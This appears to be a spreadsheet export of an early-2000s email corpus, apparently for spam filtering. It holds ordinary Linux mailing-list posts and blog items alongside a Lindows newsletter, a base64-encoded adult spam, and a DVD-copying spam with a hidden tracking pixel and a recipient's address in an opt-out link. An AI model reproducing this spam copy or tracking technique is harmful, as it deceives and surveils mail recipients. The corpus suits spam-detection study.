 &lt;TITLE&gt;Message&lt;/TITLE&gt;
 &lt;META content=3D"MSHTML 6.00.2600.0" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;DIV&gt;
 &lt;DIV align=3Dleft&gt;
 &lt;P class=3DMsoPlainText style=3D"MARGIN: 0in 0in 0pt"&gt;&lt;FONT =
 face=3DArial&gt;&lt;SPAN=20
 style=3D"mso-spacerun: yes"&gt;&lt;/SPAN&gt;&lt;?xml:namespace prefix =3D o ns =3D=20
 "urn:schemas-microsoft-com:office:office" /&gt;&lt;o:p&gt;&lt;FONT=20
 face=3D"Times New Roman"&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&lt;FONT face=3D"Arial, Helv" size=3D1&gt;If this message is =
 not=20
 displaying properly, &lt;A href=3D"http://lindows.com/mm"&gt;click here&lt;/A&gt; to =
 launch it=20
 in your browser.&lt;/FONT&gt;&lt;/P&gt;
 &lt;DIV align=3Dcenter&gt;
 &lt;CENTER&gt;
 &lt;TABLE cellSpacing=3D0 borderColorDark=3D#0577ba cellPadding=3D0 =
 width=3D600=20
 bgColor=3D#dfeedc border=3D1&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD width=3D"100%"&gt;
       &lt;P align=3Dcenter&gt;&lt;A href=3D"http://lindows.com/"&gt;&lt;IMG =
 height=3D160=20
       src=3D"http://net2.com/mailers/header.jpg" width=3D600 =
 border=3D0&gt;&lt;/A&gt;&lt;/P&gt;
       &lt;DIV align=3Dcenter&gt;
       &lt;TABLE height=3D1403 cellSpacing=3D0 cellPadding=3D0 width=3D557 =
 border=3D0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=3D557 height=3D48&gt;
             &lt;P class=3DMsoNormal align=3Dcenter&gt;&lt;B&gt;&lt;SPAN=20
             style=3D"FONT-FAMILY: Arial"&gt;&lt;FONT size=3D5&gt;Michael&amp;#8217;s =
 Minute: &lt;BR&gt;Do the=20
             Math...Dispel the Myths &lt;/FONT&gt;&lt;/SPAN&gt;&lt;/B&gt;&lt;/P&gt;
         &lt;TR&gt;
           &lt;TD class=3Dtableborders vAlign=3Dtop width=3D557 =
 height=3D1336&gt;
             &lt;P class=3DMsoNormal&gt;&amp;nbsp;&lt;/P&gt;
             &lt;P class=3DMsoNormal&gt;&lt;SPAN style=3D"FONT-FAMILY: Arial"&gt;A =
 reporter came=20
             by the &lt;A=20
             style=3D"COLOR: blue; TEXT-DECORATION: underline; =
 text-underline: single"=20
             href=3D"http://www.lindows.com/"&gt;Lindows.com&lt;/A&gt; offices =
 last Friday.=20
             He told me that he wanted to try and use&lt;A=20
             style=3D"COLOR: blue; TEXT-DECORATION: underline; =
 text-underline: single"=20
             =
 href=3D"http://www.lindows.com/lindows_products_lindowsos.php"&gt;=20
             LindowsOS&lt;/A&gt; to write a story, but he didn't think it was =
 possible=20
             because his office used Microsoft Word .doc files. I asked =
 him to=20
             have a seat and watch. &amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
             &lt;P class=3DMsoNormal&gt;&lt;SPAN style=3D"FONT-FAMILY: Arial"&gt;I =
 turned on the=20
             &lt;A=20
             style=3D"COLOR: blue; TEXT-DECORATION: underline; =
 text-underline: single"=20
             href=3D"http://www.lindows.com/walmart"&gt;Walmart.com&lt;/A&gt; =
 computer and=20
             then clicked on the running man &lt;A=20
             href=3D"http://www.lindows.com/warehouse"&gt;&lt;IMG height=3D19=20
             src=3D"http://www.net2.com/mailers/CNR-32.gif" width=3D20 =
 align=3DtextTop=20
             border=3D0&gt; &lt;/A&gt;&amp;nbsp;which took me to the Click-N-Run &lt;A=20
             style=3D"COLOR: blue; TEXT-DECORATION: underline; =
 text-underline: single"=20
             href=3D"http://www.lindows.com/warehouse"&gt;Warehouse&lt;/A&gt; =
 where I=20
             installed &lt;A=20
             style=3D"COLOR: blue; TEXT-DECORATION: underline; =
 text-underline: single"=20
             href=3D"http://www.lindows.com/openoffice"&gt;OpenOffice&lt;/A&gt; =
 using=20
             Click-N-Run. I then clicked the "Run It"&amp;nbsp; button which =
 opened=20
             the word processor OpenOffice Writer. I then typed &lt;I&gt;"Linux =
 is=20
             ready for the desktop and consumers can save hundreds using=20
             LindowsOS."&lt;/I&gt; I selected "&lt;I&gt;Save as Microsoft=20
             Word.&lt;/I&gt;"&lt;/SPAN&gt;&lt;/P&gt;
             &lt;P class=3DMsoNormal&gt;&lt;SPAN style=3D"FONT-FAMILY: Arial"&gt;The =
 reporter was=20
             not only surprised, he was amazed. Like many reporters, he =
 was under=20
             the impression that Linux was only for servers. The simple =
 word=20
             processor demonstration went a long way to show him =
 otherwise. For=20
             Linux to become a driving force in desktop computing it will =
 have to=20
             overcome a couple of myths.&lt;/SPAN&gt;&lt;B&gt;&lt;SPAN=20
             style=3D"FONT-FAMILY: Arial"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/B&gt;&lt;/P&gt;
             &lt;P class=3DMsoNormal&gt;&lt;SPAN style=3D"FONT-FAMILY: Arial"&gt;The =
 first myth=20
             is that Linux is too hard to install and configure. That may =
 have=20
             been true in the past, but we&amp;#8217;ve annihilated this myth =
 with the=20
             latest version of LindowsOS --which installs on most =
 machines in=20
             under 5 minutes. It's point- and-shoot easy - easier than =
 any other=20
             operating system (Microsoft products included). See for =
 yourself at=20
             &lt;A=20
             style=3D"COLOR: blue; TEXT-DECORATION: underline; =
 text-underline: single"=20
             =
 href=3D"http://www.tryoutlinux.com/"&gt;www.tryoutlinux.com&lt;/A&gt;.=20
             &amp;nbsp;&lt;/SPAN&gt;&lt;/P&gt;
             &lt;P class=3DMsoNormal&gt;&lt;SPAN style=3D"FONT-FAMILY: Arial"&gt;The =
 other myth=20
             is that Linux is just for the server and none of the =
 graphical=20
             programs --which desktop users have come to rely on-- exist. =
 Not=20
             only have many of the Linux software programs made quantum =
 leaps=20
             over the last couple of years, but they've gotten quite good =
 at=20
             reading and writing Microsoft formats. The easiest way to =
 experience=20
             these products is via the &lt;A=20
             style=3D"COLOR: blue; TEXT-DECORATION: underline; =
 text-underline: single"=20
             href=3D"http://www.lindows.com/warehouse"&gt;Click-N-Run=20
             Warehouse&lt;/A&gt;.&lt;/SPAN&gt;&lt;/P&gt;
             &lt;P class=3DMsoNormal align=3Dcenter&gt;&lt;SPAN=20
             style=3D"FONT-FAMILY: Arial"&gt;&amp;nbsp;&lt;B&gt;Here's a quick list of =
 some of=20
             the quality programs available today in the &lt;A=20
             href=3D"http://www.lindows.com/warehouse"&gt;Warehouse&lt;/A&gt; all =
 downloaded=20
             and installed with a single click:&lt;/B&gt;&lt;/SPAN&gt;&lt;/P&gt;
             &lt;P class=3DMsoNormal&gt;&lt;B&gt;&lt;SPAN=20
             style=3D"FONT-FAMILY: Arial"&gt;OpenOffice&lt;/SPAN&gt;&lt;/B&gt;&lt;SPAN=20
             style=3D"FONT-FAMILY: Arial"&gt; - This one installation will =
 equip a=20
             computer with an impressive collection of productivity =
 programs each=20
             of which will open the corresponding Microsoft file format =
 and allow=20
             you to edit files and swap them with Microsoft counterparts. =
 &lt;A=20
             style=3D"COLOR: blue; TEXT-DECORATION: underline; =
 text-underline: single"=20
             =
 href=3D"http://www.lindows.com/openoffice"&gt;www.lindows.com/openoffice&lt;/A&gt;=
 =20
             &amp;nbsp;Programs included are:&lt;/SPAN&gt;&lt;/P&gt;
             &lt;P class=3DMsoNormal&gt;&lt;SPAN style=3D"FONT-FAMILY: =
 Arial"&gt;&lt;B&gt;OpenOffice=20
             Writer&lt;/B&gt; - Word processor (reads Microsoft Word docs)=20
             &lt;BR&gt;&lt;B&gt;OpenOffice Calc&lt;/B&gt; - Spreadsheet (reads Microsoft =
 Excel)=20
             &lt;BR&gt;&lt;B&gt;OpenOffice Impress&lt;/B&gt;- Presentation package (reads =
 Microsoft=20
             PowerPoint)&lt;BR&gt;&lt;B&gt;OpenOffice Draw&lt;/B&gt; - A vector based =
 drawing=20
             program&lt;/SPAN&gt;&lt;/P&gt;
             &lt;P class=3DMsoNormal&gt;&lt;FONT class=3DBodyText1 =
 face=3DArial&gt;Click &lt;A=20
             href=3D"http://www.lindows.com/openofficeflash"&gt;here&lt;/A&gt; for =
 a great=20
             tutorial on getting to know OpenOffice.&lt;/FONT&gt;&lt;/P&gt;
             &lt;P class=3DMsoNormal&gt;&lt;SPAN style=3D"FONT-FAMILY: =
 Arial"&gt;&lt;B&gt;GIMP&lt;/B&gt; (&lt;A=20
             style=3D"COLOR: blue; TEXT-DECORATION: underline; =
 text-underline: single"=20
             =
 href=3D"http://www.lindows.com/gimp"&gt;www.lindows.com/gimp&lt;/A&gt;)=20
             &lt;/SPAN&gt;&lt;FONT face=3DArial&gt;If you are familiar with Adobe's =
 Photoshop,=20
             you'll want to Click-N-Run GIMP. It's a powerful image =
 editor.=20
             &lt;/FONT&gt;&lt;BR&gt;&amp;nbsp;&lt;/P&gt;
             &lt;P class=3DMsoNormal&gt;&lt;SPAN style=3D"FONT-FAMILY: =
 Arial"&gt;&lt;B&gt;Evolution=20
             &lt;/B&gt;&amp;nbsp;(&lt;A=20
             style=3D"COLOR: blue; TEXT-DECORATION: underline; =
 text-underline: single"=20
             =
 href=3D"http://www.lindows.com/evolution"&gt;www.lindows.com/evolution&lt;/A&gt;) =
             For those used to Microsoft's Outlook email program =
 Evolution will=20
             make them feel right at home. Check out how easy it is to &lt;A =
             =
 href=3D"http://www.lindows.com/evolution"&gt;use&lt;/A&gt;.&lt;/SPAN&gt;&lt;/P&gt;
             &lt;P class=3DMsoNormal&gt;&lt;SPAN style=3D"FONT-FAMILY: =
 Arial"&gt;&lt;B&gt;Flowchart=20
             Pro&lt;/B&gt;, which is similar to Microsoft&amp;#8217;s Visio, is a =
 &amp;nbsp;rich=20
             charting program that makes it possible to create flow =
 charts and=20
             organizational charts, plus more. See how easy it for =
 yourself,=20
             visit Flowchart Pro at &lt;A=20
             style=3D"COLOR: blue; TEXT-DECORATION: underline; =
 text-underline: single"=20
             =
 href=3D"http://www.lindows.com/flowchartpro"&gt;&amp;nbsp;www.lindows.com/flowch=
 artpro&lt;/A&gt;&lt;/SPAN&gt;&lt;/P&gt;
             &lt;P class=3DMsoNormal align=3Dleft&gt;&lt;SPAN =
 style=3D"FONT-FAMILY: Arial"&gt;This=20
             is just a handful of the quality programs available in the =
 Warehouse=20
             (&lt;A=20
             style=3D"COLOR: blue; TEXT-DECORATION: underline; =
 text-underline: single"=20
             =
 href=3D"http://www.lindows.com/warehouse"&gt;www.lindows.com/warehouse&lt;/A&gt;) =
             that make Linux a practical choice for the desktop today. =
 And if=20
             you're still not convinced, then do the math.&lt;/SPAN&gt;&lt;/P&gt;
             &lt;P class=3DMsoNormal align=3Dcenter&gt;&lt;A=20
             href=3D"http://www.lindows.com/walmart"&gt;&lt;IMG height=3D224=20
             src=3D"http://www.net2.com/mailers/do-the-math5.jpg" =
 width=3D555=20
             border=3D0&gt;&lt;/A&gt;&lt;BR&gt;&lt;FONT size=3D1&gt;&lt;FONT =
 face=3DArial&gt;For&amp;nbsp; a total=20
             cost of &lt;A href=3D"http://www.lindows.com/walmart"&gt;$499&lt;/A&gt;, =
 including=20
             all&amp;nbsp; software, computer users save&amp;nbsp; more than =
 $800&amp;nbsp;=20
             for a complete system.&lt;/FONT&gt; &lt;/FONT&gt;&lt;/P&gt;
             &lt;P class=3DMsoNormal&gt;&lt;SPAN style=3D"FONT-FAMILY: Arial"&gt;With =
 such major=20
             price differentials between the two similarly equipped =
 systems, any=20
             business, school or home will find their computing dollars =
 stretched=20
             much further running LindowsOS. &lt;/SPAN&gt;&lt;/P&gt;
             &lt;P&gt;&lt;FONT face=3D"Arial, Helv" size=3D3&gt;Michael =
 Robertson&lt;/FONT&gt;&lt;/P&gt;
             &lt;P&gt;&lt;FONT face=3D"Arial, Helv" size=3D2&gt;Please visit &lt;A=20
             href=3D"http://support.lindows.com/"&gt;support.lindows.com&lt;/A&gt; =
 to=20
             answers questions you may have about LindowsOS or=20
             Lindows.com.&lt;/FONT&gt;&lt;/P&gt;
             &lt;P&gt;&lt;B&gt;&lt;FONT face=3DArial size=3D2&gt;Bringing Choice to Your =
 Computer!=20
             &lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
             &lt;DIV&gt;&lt;SPAN class=3D154440621-26062002&gt;&lt;FONT face=3DArial=20
             size=3D1&gt;LindowsOS is presently available on LindowsOS =
 Certified=20
             Computers being offered from Lindows.com &lt;/FONT&gt;&lt;A=20
             href=3D"http://www.lindows.com/builder"&gt;&lt;FONT face=3DArial=20
             size=3D1&gt;Builder&lt;/FONT&gt;&lt;/A&gt;&lt;FONT face=3DArial size=3D1&gt; =
 partners.&amp;nbsp;=20
             The General Release of LindowsOS (available now for download =
 and=20
             preview to Lindows.com &lt;/FONT&gt;&lt;A=20
             href=3D"http://lindows.com/signup"&gt;&lt;FONT face=3DArial=20
             size=3D1&gt;Insider&lt;/FONT&gt;&lt;/A&gt;&lt;FONT face=3DArial size=3D1&gt; =
 partners) will be=20
             made available later this year for those wishing to install =
 and run=20
             LindowsOS on their existing computer hardware.&amp;nbsp; The =
 General=20
             Release version will support a wider range of computer =
 hardware and=20
             includes unique features such as a =
 &amp;#8220;Friendly-Install&amp;#8221; alongside an=20
             existing Microsoft&amp;reg; Windows operating system, a =
 streamlined=20
             installation process which requires no computer knowledge, =
 and the=20
             ability to run a select set of "bridge" Windows-compatible =
 programs.=20
             For more information see &lt;/FONT&gt;&lt;A=20
             href=3D"http://www.lindows.com/products"&gt;&lt;FONT face=3DArial=20
             size=3D1&gt;www.lindows.com/products&lt;/FONT&gt;&lt;/A&gt;&lt;FONT =
 face=3DArial=20
             size=3D1&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/DIV&gt;
             &lt;P&gt;&lt;FONT face=3DArial size=3D1&gt;LindowsOS and Lindows.com are =
 trademarks=20
             of Lindows.com, Inc. Linux&amp;reg; is a registered trademark of =
 Linus=20
             Torvalds. Microsoft&amp;reg; Windows&amp;reg; operating system is a =
 registered=20
             trademark or service mark of the Microsoft =
 Corporation.&lt;/FONT&gt;&lt;/P&gt;
             &lt;P&gt;&lt;FONT face=3D"Arial, Helv"=20
       size=3D1&gt;mm19&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P&gt;&lt;BR&gt;&lt;/P&gt;&lt;/DIV&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/DIV&gt;
 &lt;P=20
 align=3Dcenter&gt;__________________________________________________________=
 _&lt;BR&gt;&lt;FONT=20
 face=3D"Arial, Helv" size=3D2&gt;To change your mailing list options please =
 go to &lt;A=20
 href=3D"http://www.lindows.com/update"&gt;www.lindows.com/update&lt;/A&gt;&lt;/FONT&gt;&lt;=
 /P&gt;
 &lt;P class=3DMsoPlainText=20
 style=3D"MARGIN: 0in 0in =
 0pt"&gt;&lt;/CENTER&gt;&lt;/o:p&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/DIV&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ------=_LINDOWS_6a72a16a171d3ceefdc7477961871f6d--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: building as non-root / newbie question
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Harri
 Thanks for the help!
 &gt; &gt; (why do I have the feeling that Matthias will answer this one...? ;-)
 &gt; 
 &gt; I'm sorry if I disappointed you :)
 Hehe, no not at all! ;)
 ------------------------------------------------
 Kevin Worthington - &lt;kworthington (at) linuxmail {dot} org&gt;
 Faithful Red Hat Linux user since April 1998
 Registered Linux User #218689 - http://counter.li.org
 -- 
 Get your free email from www.linuxmail.org 
 Powered by Outblaze
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Soros' _Open Society_ &amp; cardinal virtues
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Soros, in _Open Society_, says he
 has a theory that the coevolutionary
 nature of finance and history mean
 they are subject to many boom-bust
 cycles.  As a result of having some
 leisure time after playing them so
 successfully with Quantum Fund, he
 now believes that we need to keep
 our strategies as game players and
 rule makers distinct: the ends of
 rule makers can't be so strictly
 personal as those of game players.
 Do the cardinal virtues provide a
 set of restoring forces which allow
 one to act in balance?
 temperance  - avoid hubris in booms
 fortitutude - avoid depression in busts
 prudence    - maximize personal utility (as a game player)
 justice     - maximize common good (as a rule maker)
 -Dave
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CSS and mobile devices
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/03.html#css_and_mobile_devices
 Date: 2002-10-03T14:52:57-05:00
 So, d'ya remember that whole CSS debate that flared up about six months ago? 
 (Actually, it flares up continuously in various circles. In fact, I think it's 
 about time for it to flare up again in weblogging circles. These things are 
 inexorably cyclical. CSS-vs-tables is the hemorrhoid of the web design world. 
 But I digress.) 
 If you were around back then, you will no doubt recall that I was in the 
 pro-CSS camp[1]. 
 So anyway, d'ya remember that argument that went something like &amp;#8220;you 
 should design with web standards and CSS because it will future-proof your site 
 for the pie-in-the-sky future when people surf the web on mobile 
 devices&amp;#8221;? Well, it's crap[2]. 
 There are lots of good arguments for designing with web standards and CSS: 
 automatically print-friendly pages[3], dynamic style switchers[4], reduced 
 bandwidth[5], and aiding and abetting accessibility[6] (a topic which I claim 
 to know a lot about[7]), among others. But &amp;#8220;because it'll future-proof 
 your site for the next generation of mobile devices&amp;#8221; is not one of them. 
 The theory is solid, but apparently nobody told the makers of the mobile 
 devices (now that we have them) how it was all supposed to work in practice. 
 Oops.
 [1] http://diveintomark.org/archives/rooms/css/
 [2] http://www.dashes.com/anil/index.php?archives/003378.php
 [3] http://diveintomark.org/archives/2002/02/01.html#print_me
 [4] http://diveintomark.org/archives/2002/02/13.html#css_fun_and_games
 [5] http://diveintomark.org/archives/2002/02/14.html#moral_arguments_aside
 [6] http://diveintomark.org/archives/2002/02/15.html#css_and_universal_design
 [7] http://diveintoaccessibility.org/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Re: Problems with RAID1 on cobalt raq3
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, Aug 19, 2002 at 03:08:16PM +0100, John P. Looney mentioned:
 &gt;  This is likely because to get it to boot, like the cobalt, I'm actually
 &gt; passing root=/dev/hda5 to the kernel, not /dev/md0. 
  Just to solve this...the reason I was booting the box with
 root=/dev/hda5, not /dev/md0 was because /dev/md0 wasn't booting - it
 would barf with 'can't find init'.
  It turns out that this is because I was populating md0 with tar. Which
 seems to have 'issues' with crosslinked files - for instance, it was
 trying to make a hard link of glibc.so to hda - and failing. It was only
 as I did it again with a friend present, that he spotted the errors, and
 queried them. We noticed that the hard linked files just didn't exist on
 the new rootfs.
  When we duplicated the filesystems with dump instead of tar, it worked
 fine, I was able to tell lilo to use root=/dev/md0 and everything worked.
  Woohoo.
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: SimPastry
</t>
  </si>
  <si>
    <t xml:space="preserve">Jim Whitehead wrote:
 &gt; http://www.research.microsoft.com/~antr/Pastry/download.htm
 Looks cute. For what it's worth I worked closely with a few
 of the people on the team. One was my officemate for years.
 Unfortunately there's no way I'm loading all the .NET stuff
 on my machine. Not yet. And hopefully by the time it's all
 stable, I'll be running FreeBSD again on my laptop, and it will
 be moot anyway.
 - Joe
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Permanent blue skin for silver drinking politician
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85520594
 Date: Not supplied
 [IMG: 
 http://i.cnn.net/cnn/2002/US/Central/10/02/candidate.blue.skin.ap/story.blue.canidate.ap.jpg
 ]In 1999, Montana's 63-old Libertarian candidate for Senator starting drinking 
 a homebrew concoction of colloidal silver to prevent bacterial infecttion (he 
 was afraid that conventional antibiotics wouldn't be available in the new 
 millennium), and now his skin has turned blue for good. Link[1] Discuss[2] _
 (Thanks for the image, Nelson!)_
 [1] http://www.ananova.com/news/story/sm_683401.html
 [2] http://www.quicktopic.com/16/H/vvkFvFGKi6J
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: My Repository...
</t>
  </si>
  <si>
    <t xml:space="preserve">[yes, I know I'm replying to myself!]
 &gt;     Your page has a typo;
 &gt; 
 &gt; http://utelsystems.dyndns.org lists:
 &gt;     rpm http://utelsystems.dyndns.org/apt redhat testingrh73
 &gt;     rpm-src http://utelsystems.dyndns.org/apt redhat testing73  &lt;--
 &gt; 
 &gt;     This is why I'm so stubborn about using cut-and-paste; not only is it easy, it's typo-free.  :)
 &gt; 
 &gt; Wouldn't it be nice if there was a way to manage these automagically?  Some central site to make them available to the rest of the world, every time there's a "apt-get update"?  :)
 it sure would.
 &gt;Also- I noticed this repo has about an 8K bandwidth.
 I know, i know. Its an ADSL connection. Should habe 128K ;-(
 Feel free to give me access to an web/ftp server with big pipes..
 -
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Never pay for porn again, YOUR FREE PAYSITE is here! 6277zwyL0-111bAgY1254IhZJ0-37-27
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00A3_00E67D7E.B8560D80
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 MzY3MmN4SmsyLTQ3MXJMWUg0ODU2ZEN3bDktMzU3a0N2eTQzMjNzQ3ZBOS03
 MTF5U3pSODJsNTANCjxicj4NCjxmb250IGZhY2U9YXJpYWwgc2l6ZT01PlRo
 ZSBXb3JsZCdzIGZpcnN0IEFCU09MVVRFTFkgRlJFRSBhZHVsdCBzdXBlcnNp
 dGUgaXMgaGVyZSEgTm8gU3RyaW5ncyBBdHRhY2hlZC4gVGhlIGhvdHRlc3Qg
 dGVlbiBwaWN0b3JpYWxzLCBsaXZlIHNob3dzLCBtb3ZpZXMsIGFuZCBtb3Jl
 IGFsd2F5cyBmcmVlISA8YSBocmVmPSJodHRwOi8vbXlmcmVlcGF5c2l0ZS41
 eHgubmV0Ij5DbGljayBoZXJlIC0gYWxsIHlvdSBuZWVkIGlzIGFuIGVtYWls
 IGFkZHJlc3MgdG8gam9pbjwvYT4hDQo8YnI+PGJyPjxicj4NCjxmb250IGZh
 Y2U9YXJpYWwgc2l6ZT0yPlRoaXMgaXMgYSBvbmUgdGltZSB0YXJnZXRlZCBt
 YWlsaW5nLCA8L2ZvbnQ+PC9mb250Pjxmb250IGZhY2U9ImFyaWFsIiBzaXpl
 PSIyIj5idXQNCnlvdSBtYXkgcmVtb3ZlIHlvdXJzZWxmIGJ5IHJlcGx5aW5n
 IHRvIHRoaXMgZW1haWwgd2l0aCAmcXVvdDtSRU1PVkUmcXVvdDsgYXMgdGhl
 DQpzdWJqZWN0ITxmb250IGZhY2U9YXJpYWwgc2l6ZT01Pg0KPGJyPjxicj48
 L2ZvbnQ+DQo1MTgwcWdzZjYtMTY3eHpLWjI0NTRQRUN1OS03MjF3emJwODg0
 MGpsMzc=
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Wow...what a program!
</t>
  </si>
  <si>
    <t xml:space="preserve">--##########
 See below for your Exit Information.
 ============================================================================================================
 Everything you need to copy DVD movies! 
 DVD Copy Plus contains: 
 Step by Step Interactive Instructions 
 All Software Tools Included On CD 
 30 Day Risk Free Trial Available 
 FREE Live Technical Support Available 
 No DVD Burner Required 
 NEW! - INSTANT DOWNLOAD 
 Cut and Paste this address into your browser now! http://results.reliatrack.com/select.php?pos=99000262292&amp;active=2130685 
 ============================================================================================================
 Your email address has been submitted to The PermissionPass Network for mailing by one of our merchant clients, or included as part of an assets purchase.  You may permanently remove yourself at http://www.permissionpass.com/optout.php?email=jm@netnoteinc.com&amp;pos=99000262292.  Thank you..
 - CopyMyDVD.com
 --##########
 Content-Type: text/html
 Content-Transfer-Encoding: 7bit
 Content-Disposition: inline
 &lt;table&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;font face="arial" size="1"&gt;&lt;u&gt;&lt;font color="#FFFFFF"&gt;  See below for your Exit Information.&lt;/U&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TD&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://results.reliatrack.com/active.php?xactive=99000262292&amp;yactive=http://results.reliatrack.com/active.gif" height="1" width="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/TABLE&gt;
 &lt;html&gt; 
 &lt;head&gt; 
 &lt;title&gt;copyDVD&lt;/title&gt; 
 &lt;meta http-equiv="Content-Type" content="text/html;"&gt; 
 &lt;!-- Fireworks 4.0 Dreamweaver 4.0 target. Created Tue Apr 09 16:23:01 GMT-0500 (Central Daylight Time) 2002--&gt; 
 &lt;/head&gt; 
 &lt;body bgcolor="#000000"&gt; 
 &lt;table border="0" cellpadding="0" cellspacing="0" width="600" align="center"&gt; 
 &lt;!-- fwtable fwsrc="http://www.copymydvd.com/mailer4/mailer4.png" fwbase="http://www.copymydvd.com/mailer4/mailer4.gif" 
 fwstyle="Dreamweaver" fwdocid = "742308039" fwnested="0" --&gt; 
 &lt;tr&gt; 
 &lt;td&gt;&lt;img src="http://www.copymydvd.com/mailer4/spacer.gif" width="15" height="1" border="0"&gt;&lt;/td&gt; 
 &lt;td&gt;&lt;img src="http://www.copymydvd.com/mailer4/spacer.gif" width="203" height="1" border="0"&gt;&lt;/td&gt; 
 &lt;td&gt;&lt;img src="http://www.copymydvd.com/mailer4/spacer.gif" width="21" height="1" border="0"&gt;&lt;/td&gt; 
 &lt;td&gt;&lt;img src="http://www.copymydvd.com/mailer4/spacer.gif" width="78" height="1" border="0"&gt;&lt;/td&gt; 
 &lt;td&gt;&lt;img src="http://www.copymydvd.com/mailer4/spacer.gif" width="266" height="1" border="0"&gt;&lt;/td&gt; 
 &lt;td&gt;&lt;img src="http://www.copymydvd.com/mailer4/spacer.gif" width="17" height="1" border="0"&gt;&lt;/td&gt; 
 &lt;td&gt;&lt;img src="http://www.copymydvd.com/mailer4/spacer.gif" width="1" height="1" border="0"&gt;&lt;/td&gt; 
 &lt;/tr&gt; 
 &lt;tr&gt; 
 &lt;td colspan="6"&gt;&lt;img name="mailer4_r1_c1" src="http://www.copymydvd.com/mailer4/mailer4_r1_c1.gif" width="600" height="75" 
 border="0"&gt;&lt;/td&gt; 
 &lt;td&gt;&lt;img src="http://www.copymydvd.com/mailer4/spacer.gif" width="1" height="75" border="0"&gt;&lt;/td&gt; 
 &lt;/tr&gt; 
 &lt;tr&gt; 
 &lt;td rowspan="2" colspan="3"&gt;&lt;img name="mailer4_r2_c1" src="http://www.copymydvd.com/mailer4/mailer4_r2_c1.gif" width="239" 
 height="162" border="0"&gt;&lt;/td&gt; 
 &lt;td colspan="2"&gt;&lt;img name="mailer4_r2_c4" src="http://www.copymydvd.com/mailer4/mailer4_r2_c4.gif" width="344" height="18" 
 border="0"&gt;&lt;/td&gt; 
 &lt;td rowspan="5"&gt;&lt;img name="mailer4_r2_c6" src="http://www.copymydvd.com/mailer4/mailer4_r2_c6.gif" width="17" height="325" 
 border="0"&gt;&lt;/td&gt; 
 &lt;td&gt;&lt;img src="http://www.copymydvd.com/mailer4/spacer.gif" width="1" height="18" border="0"&gt;&lt;/td&gt; 
 &lt;/tr&gt; 
 &lt;tr&gt; 
 &lt;td rowspan="2" colspan="2" background="http://www.copymydvd.com/mailer4/mailer4_r3_c4.gif" align="left" valign="top"&gt; 
 &lt;div align="center"&gt; 
 &lt;p align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;Everything 
 you need to copy DVD movies!&lt;/b&gt;&lt;/font&gt;&lt;/p&gt; 
 &lt;p align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font color="#003366"&gt;DVD 
 Copy Plus contains:&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt; 
 &lt;p align="left"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;Step by Step 
 Interactive Instructions &lt;br&gt; 
 All Software Tools Included On CD &lt;br&gt; 
 30 Day Risk Free Trial Available&lt;br&gt; 
 FREE Live Technical Support Available&lt;br&gt; 
 No DVD Burner Required&lt;/font&gt;&lt;/b&gt;&lt;/p&gt; 
 &lt;p align="left"&gt;&lt;b&gt;&lt;font face="Arial, Helvetica, sans-serif" color="#003366"&gt;NEW! 
 - INSTANT DOWNLOAD&lt;/font&gt;&lt;/b&gt;&lt;/p&gt; 
 &lt;p&gt;&lt;a href="http://results.reliatrack.com/select.php?pos=99000262292&amp;active=5951152"&gt;&lt;img src="http://www.copymydvd.com/mailer4/button-up.gif" width="130" 
 height="40" border="0"&gt;&lt;/a&gt;&lt;/p&gt; 
 &lt;/div&gt; 
 &lt;/td&gt; 
 &lt;td&gt;&lt;img src="http://www.copymydvd.com/mailer4/spacer.gif" width="1" height="144" border="0"&gt;&lt;/td&gt; 
 &lt;/tr&gt; 
 &lt;tr&gt; 
